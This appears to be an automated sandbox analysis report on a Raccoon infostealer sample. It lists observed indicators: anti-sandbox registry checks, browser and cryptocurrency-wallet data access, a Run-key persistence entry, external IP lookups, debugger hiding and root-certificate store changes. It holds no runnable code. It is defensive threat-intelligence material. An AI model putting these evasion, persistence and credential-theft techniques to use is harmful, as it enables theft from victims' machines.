raccoon | b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5543246.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	msiexec.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	msiexec.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5543246.scr

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\International\Geo\Nation	Thu166f9a8bbe80.exe

Loads dropped DLL 64 IoCs

pid	Process
1612	setup_x86_x64_install.exe
1248	setup_installer.exe
1248	setup_installer.exe
1248	setup_installer.exe
1248	setup_installer.exe
1248	setup_installer.exe
1248	setup_installer.exe
2028	setup_install.exe
2028	setup_install.exe
2028	setup_install.exe
2028	setup_install.exe
2028	setup_install.exe
2028	setup_install.exe
2028	setup_install.exe
2028	setup_install.exe
1740	cmd.exe
1628	cmd.exe
772	Thu166f9a8bbe80.exe
772	Thu166f9a8bbe80.exe
1664	cmd.exe
1664	cmd.exe
1748	cmd.exe
884	cmd.exe
884	cmd.exe
476	cmd.exe
1092	5543246.scr
1092	5543246.scr
1824	Thu16466b26f8b7.exe
1824	Thu16466b26f8b7.exe
1012	taskkill.exe
1012	taskkill.exe
1604	cmd.exe
1044	conhost.exe
1704	Thu167d514d2a7ac5a.exe
1704	Thu167d514d2a7ac5a.exe
1512	Thu16f3de88a335950bb.exe
1512	Thu16f3de88a335950bb.exe
1512	Thu16f3de88a335950bb.exe
1264	Thu165bd34b1e1d4d81.exe
1264	Thu165bd34b1e1d4d81.exe
1476	Thu16f3de88a335950bb.tmp
1476	Thu16f3de88a335950bb.tmp
1476	Thu16f3de88a335950bb.tmp
1476	Thu16f3de88a335950bb.tmp
2016	Thu16f3de88a335950bb.exe
2016	Thu16f3de88a335950bb.exe
2016	Thu16f3de88a335950bb.exe
2012	Thu16f3de88a335950bb.tmp
2012	Thu16f3de88a335950bb.tmp
2012	Thu16f3de88a335950bb.tmp
2012	Thu16f3de88a335950bb.tmp
2012	Thu16f3de88a335950bb.tmp
2012	Thu16f3de88a335950bb.tmp
1084	FarLabUninstaller.exe
1084	FarLabUninstaller.exe
1120	postback.exe
1120	postback.exe
2012	Thu16f3de88a335950bb.tmp
1088	NDP472-KB4054531-Web.exe
1088	NDP472-KB4054531-Web.exe
1088	NDP472-KB4054531-Web.exe
1340	Setup.exe
1340	Setup.exe
1720	wevtutil.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	wevtutil.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5543246.scr

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com
43	ipinfo.io
44	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1092	5543246.scr
2084	msiexec.exe

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\FarLabUninstaller\is-3L71N.tmp	Thu16f3de88a335950bb.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-47T40.tmp	Thu16f3de88a335950bb.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-T875O.tmp	Thu16f3de88a335950bb.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-UMBTK.tmp	Thu16f3de88a335950bb.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Thu16f3de88a335950bb.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe	Thu16f3de88a335950bb.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe	Thu16f3de88a335950bb.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Thu16f3de88a335950bb.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
2852	772	WerFault.exe	33
476	2684	WerFault.exe	76
3040	2556	WerFault.exe	104

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu16466b26f8b7.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu16466b26f8b7.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu16466b26f8b7.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
1012	taskkill.exe
2984	taskkill.exe
2288	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 11 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Thu161580bf75.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Thu161580bf75.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Thu167d514d2a7ac5a.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Thu165bd34b1e1d4d81.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Thu165bd34b1e1d4d81.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Thu161580bf75.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Thu161580bf75.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Thu167d514d2a7ac5a.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Thu161580bf75.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	Thu161580bf75.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Thu161580bf75.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1824	Thu16466b26f8b7.exe
1824	Thu16466b26f8b7.exe
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
2012	Thu16f3de88a335950bb.tmp
2012	Thu16f3de88a335950bb.tmp
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1272	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1824	Thu16466b26f8b7.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

description	pid	Process
Token: SeDebugPrivilege	1028	Thu161580bf75.exe
Token: SeCreateTokenPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeAssignPrimaryTokenPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeLockMemoryPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeIncreaseQuotaPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeMachineAccountPrivilege	1264	Thu165bd34b1e1d4d81.exe
